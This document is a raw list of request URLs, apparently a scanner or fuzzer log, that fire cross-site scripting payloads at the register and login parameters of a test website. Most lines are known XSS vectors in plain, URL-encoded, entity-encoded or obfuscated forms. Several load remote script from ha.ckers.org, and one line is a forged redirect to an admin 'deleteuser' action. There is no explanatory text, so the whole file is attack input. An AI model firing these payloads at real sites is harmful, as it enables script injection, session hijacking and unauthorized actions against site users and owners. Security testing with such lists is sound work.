/test/website/register.php?username=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&password2=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&password=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&
/test/website/index.php?username=See+Below&password=See+Below&name=See+Below&
/test/website/register.php?name=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E
/test/website/?password=<SCRIPT/XSS+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/?name=<TABLE><TD+BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
/test/website/index.php?name=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/test/website/register.php?name=<META+HTTP-EQUIV="Link"+Content="<http://ha.ckers.org/xss.css>;+REL=stylesheet">
/test/website/index.php?name=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/test/website/register.php?username=<LINK+REL="stylesheet"+HREF="javascript:alert('XSS');">&password2=<LINK+REL="stylesheet"+HREF="javascript:alert('XSS');">&password=<LINK+REL="stylesheet"+HREF="javascript:alert('XSS');">&name=<LINK+REL="stylesheet"+HREF="javascript:alert('XSS');">&
/test/website/?username=<HTML+xmlns:xss>+<?import+namespace="xss"+implementation="http://ha.ckers.org/xss.htc">+<xss:xss>XSS</xss:xss>+</HTML>
/test/website/register.php?username=%3CIMG+SRC%3D%60javascript%3Aalert%28%22RSnake+says%2C+%27XSS%27%22%29%60%3E
/test/website/index.php?name=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22
/test/website/?password=%3CSTYLE%3Eli+%7Blist-style-image%3A+url%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS
/test/website/register.php?name=<A+HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
/test/website/?name=<IMG+SRC+=+"+j+a+v+a+s+c+r+i+p+t+:+a+l+e+r+t+(+'+X+S+S+'+)+"+>
/test/website/?username=<IMG+SRC=javascript:alert(String.fromCharCode(88,83,83))>
/test/website/?username=%3CIMG+SRC%3D%22+%26%2314%3B+javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?username=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/register.php?password=<A+HREF="http://www.google.com./">XSS</A>
/test/website/register.php?name=<META+HTTP-EQUIV="Set-Cookie"+Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/test/website/register.php?password2=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?username=<BR+SIZE="&{alert('XSS')}">
/test/website/?password=<IMG+SRC="jav&#x09;ascript:alert('XSS');">
/test/website/?username=<TABLE><TD+BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
/test/website/register.php?username=<IMG+SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
/test/website/register.php?username=<INPUT+TYPE="IMAGE"+SRC="javascript:alert('XSS');">&password2=<INPUT+TYPE="IMAGE"+SRC="javascript:alert('XSS');">&password=<INPUT+TYPE="IMAGE"+SRC="javascript:alert('XSS');">&name=<INPUT+TYPE="IMAGE"+SRC="javascript:alert('XSS');">&
/test/website/register.php?username=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?password=%3CBGSOUND+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?password=<TABLE><TD+BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
/test/website/register.php?username=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E
/test/website/register.php?password2=<IMG+SRC=javascript:alert('XSS')>
/test/website/register.php?username=<META+HTTP-EQUIV="refresh"+CONTENT="0;+URL=http://;URL=javascript:alert('XSS');">
/test/website/index.php?password=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/test/website/index.php?password=%3CBGSOUND+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?name=<IMG+SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
/test/website/register.php?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?username=<A+HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>&password=<A+HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>&name=<A+HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>&
/test/website/register.php?username=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E&password2=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E&password=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E&name=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E&
/test/website/?username=<OBJECT+classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param+name=url+value=javascript:alert('XSS')></OBJECT>
/test/website/register.php?password2=<A+HREF="http://0102.0146.0007.00000223/">XSS</A>
/test/website/?password=<SCRIPT+a=">'>"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/?username=<SCRIPT+SRC=//ha.ckers.org/.j>
/test/website/register.php?username=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22
/test/website/index.php?name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E
/test/website/index.php?username=<SCRIPT+a=">"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>&password=<SCRIPT+a=">"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>&name=<SCRIPT+a=">"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>&
/test/website/?name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E
/test/website/register.php?name=<SCRIPT>a=/XSS/+alert(a.source)</SCRIPT>
/test/website/?password=<SCRIPT+a=`>`+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?name=<IMG+SRC="jav&#x0D;ascript:alert('XSS');">
/test/website/register.php?username=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">&password2=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">&password=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">&name=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">&
/test/website/index.php?name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?username=<IMG+SRC='vbscript:msgbox("XSS")'>
/test/website/register.php?name=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?username=%3CIMG+DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?password2=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/test/website/index.php?name=<XML+SRC="http://ha.ckers.org/xsstest.xml"+ID=I></XML>+<SPAN+DATASRC=#I+DATAFLD=C+DATAFORMATAS=HTML></SPAN>
/test/website/index.php?username=a%3D%22get%22%3B%26%2310%3Bb%3D%22URL%28%22%22%3B%26%2310%3Bc%3D%22javascript%3A%22%3B%26%2310%3Bd%3D%22alert%28%27XSS%27%29%3B%22%29%22%3B+eval%28a%2Bb%2Bc%2Bd%29%3B
/test/website/?name=<BGSOUND+SRC="javascript:alert('XSS');">
/test/website/?username=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E
/test/website/register.php?password=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E
/test/website/register.php?username=%3CXSS+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&password2=%3CXSS+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&password=%3CXSS+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&name=%3CXSS+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&
/test/website/register.php?password2=<SCRIPT+SRC=//ha.ckers.org/.j>
/test/website/register.php?username=<A+HREF="http://google:ha.ckers.org">XSS</A>
/test/website/?username=\";alert('XSS');//
/test/website/?name=<XSS+STYLE="xss:expression(alert('XSS'))">
/test/website/register.php?password=%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E
/test/website/index.php?username=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D
/test/website/index.php?name=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out
/test/website/?username=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?name=<BODY+BACKGROUND="javascript:alert('XSS');">
/test/website/index.php?name=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/test/website/register.php?password=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/test/website/?name=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/test/website/index.php?username=<META+HTTP-EQUIV="Set-Cookie"+Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/test/website/?name=<SCRIPT>a=/XSS/+alert(a.source)</SCRIPT>
/test/website/?password=<META+HTTP-EQUIV="Set-Cookie"+Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/test/website/register.php?password2=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/test/website/?username=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&password=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&name=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&
/test/website/?username=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E&password=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E&name=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E&
/test/website/register.php?username='';!--"<XSS>=&{()}
/test/website/register.php?username=<HTML+xmlns:xss>+<?import+namespace="xss"+implementation="http://ha.ckers.org/xss.htc">+<xss:xss>XSS</xss:xss>+</HTML>
/test/website/?username=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&password=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&
/test/website/register.php?username=%3CBODY+onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E
/test/website/?password=<A+HREF="http://google.com/">XSS</A>
/test/website/?password=exp/*<XSS+STYLE='no\xss:noxss("*//*");+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
/test/website/?name=%3CIMG+SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E
/test/website/register.php?password=<META+HTTP-EQUIV="refresh"+CONTENT="0;url=javascript:alert('XSS');">
/test/website/register.php?password2=%3CDIV+STYLE%3D%22background-image%3A+url%28%26%231%3Bjavascript%3Aalert%28%27XSS%27%29%29%22%3E
/test/website/?username=a%3D%22get%22%3B%26%2310%3Bb%3D%22URL%28%22%22%3B%26%2310%3Bc%3D%22javascript%3A%22%3B%26%2310%3Bd%3D%22alert%28%27XSS%27%29%3B%22%29%22%3B+eval%28a%2Bb%2Bc%2Bd%29%3B&password=a%3D%22get%22%3B%26%2310%3Bb%3D%22URL%28%22%22%3B%26%2310%3Bc%3D%22javascript%3A%22%3B%26%2310%3Bd%3D%22alert%28%27XSS%27%29%3B%22%29%22%3B+eval%28a%2Bb%2Bc%2Bd%29%3B&name=a%3D%22get%22%3B%26%2310%3Bb%3D%22URL%28%22%22%3B%26%2310%3Bc%3D%22javascript%3A%22%3B%26%2310%3Bd%3D%22alert%28%27XSS%27%29%3B%22%29%22%3B+eval%28a%2Bb%2Bc%2Bd%29%3B&
/test/website/?password=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
/test/website/register.php?name=<IMG+SRC=`javascript:alert("RSnake+says,+'XSS'")`>
/test/website/?password=<IMG+SRC="jav&#x09;ascript:alert('XSS');">
/test/website/?username=<IMG+SRC="javascript:alert('XSS');">&password=<IMG+SRC="javascript:alert('XSS');">&name=<IMG+SRC="javascript:alert('XSS');">&
/test/website/register.php?username=%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E
/test/website/register.php?name=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/register.php?username=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/test/website/?name=<SCRIPT+a=">'>"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?username=<SCRIPT/XSS+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?name=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/test/website/?password=%3CIMG+DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?name=<IMG+SRC="livescript:[code]">
/test/website/register.php?name=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/test/website/register.php?password=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?name=<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
/test/website/?password=<IMG+SRC="javascript:alert('XSS');">
/test/website/index.php?username=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E&password=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E&name=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E&
/test/website/register.php?username=%3COBJECT+classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam+name%3Durl+value%3Djavascript%3Aalert%28%27XSS%27%29%3E%3C%2FOBJECT%3E
/test/website/index.php?name=%3CIFRAME+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E
/test/website/register.php?username=perl+-e+'print+"&<SCR IPT>alert("XSS")</SCR IPT>";'+>+out
/test/website/register.php?username=<A+HREF="http://google:ha.ckers.org">XSS</A>
/test/website/register.php?name=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/test/website/?name=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?username=%3CBR+SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E&password=%3CBR+SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E&name=%3CBR+SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E&
/test/website/?password=<SCRIPT+SRC=http://ha.ckers.org/xss.js></SCRIPT>
/test/website/?username=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E
/test/website/register.php?password=%3CIMG+SRC%3D%22+%26%2314%3B+javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?password2=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/test/website/?password=%3CIMG+LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?username=<A+HREF="http://66.102.7.147/">XSS</A>&password=<A+HREF="http://66.102.7.147/">XSS</A>&name=<A+HREF="http://66.102.7.147/">XSS</A>&
/test/website/index.php?name=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/test/website/register.php?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D
/test/website/?name=%3CA+HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?password2=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?username=<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
/test/website/register.php?username=%3CIMG+SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E&password2=%3CIMG+SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E&password=%3CIMG+SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E&name=%3CIMG+SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E&
/test/website/register.php?password2=%3CIMG+SRC%3D%22+%26%2314%3B+javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?name=<A+HREF="http://1113982867/">XSS</A>
/test/website/index.php?username=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?username=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/test/website/index.php?name=<XML+ID=I><X><C><![CDATA[<IMG+SRC="javas]]><![CDATA[cript:alert('XSS');">]]>+</C></X></xml><SPAN+DATASRC=#I+DATAFLD=C+DATAFORMATAS=HTML>
/test/website/index.php?name=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
/test/website/index.php?name=%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E
/test/website/index.php?name=perl+-e+%27print+%22%3CIMG+SRC%3Djava%00script%3Aalert%28%22XSS%22%29%3E%22%3B%27%3E+out
/test/website/index.php?name=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/test/website/index.php?username=<HTML><BODY>+<?xml:namespace+prefix="t"+ns="urn:schemas-microsoft-com:time">+<?import+namespace="t"+implementation="#default#time2">+<t:set+attributeName="innerHTML"+to="XSS<SCRIPT+DEFER>alert('XSS')</SCRIPT>">+</BODY></HTML>
/test/website/register.php?username=<HTML><BODY>+<?xml:namespace+prefix="t"+ns="urn:schemas-microsoft-com:time">+<?import+namespace="t"+implementation="#default#time2">+<t:set+attributeName="innerHTML"+to="XSS<SCRIPT+DEFER>alert('XSS')</SCRIPT>">+</BODY></HTML>
/test/website/register.php?password=%3CIMG+SRC%3D%22jav+ascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?username=<BGSOUND+SRC="javascript:alert('XSS');">&password=<BGSOUND+SRC="javascript:alert('XSS');">&name=<BGSOUND+SRC="javascript:alert('XSS');">&
/test/website/?password=%3CBR+SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E
/test/website/index.php?password=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E
/test/website/?password=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?password=<META+HTTP-EQUIV="refresh"+CONTENT="0;url=javascript:alert('XSS');">
/test/website/register.php?username=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E
/test/website/register.php?username=<SCRIPT+SRC=//ha.ckers.org/.j>&password2=<SCRIPT+SRC=//ha.ckers.org/.j>&password=<SCRIPT+SRC=//ha.ckers.org/.j>&name=<SCRIPT+SRC=//ha.ckers.org/.j>&
/test/website/index.php?username=<A+HREF="http://google.com/">XSS</A>
/test/website/index.php?username=<IMG+STYLE="xss:expr/*XSS*/ession(alert('XSS'))">&password=<IMG+STYLE="xss:expr/*XSS*/ession(alert('XSS'))">&name=<IMG+STYLE="xss:expr/*XSS*/ession(alert('XSS'))">&
/test/website/?name=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/test/website/index.php?username=%3CA+HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E&
/test/website/register.php?username=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&password2=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&password=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&name=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&
/test/website/register.php?name=<LAYER+SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
/test/website/index.php?name=%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
/test/website/index.php?password=<A+HREF="http://google:ha.ckers.org">XSS</A>
/test/website/index.php?password=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E
/test/website/?username=<IMG+DYNSRC="javascript:alert('XSS');">
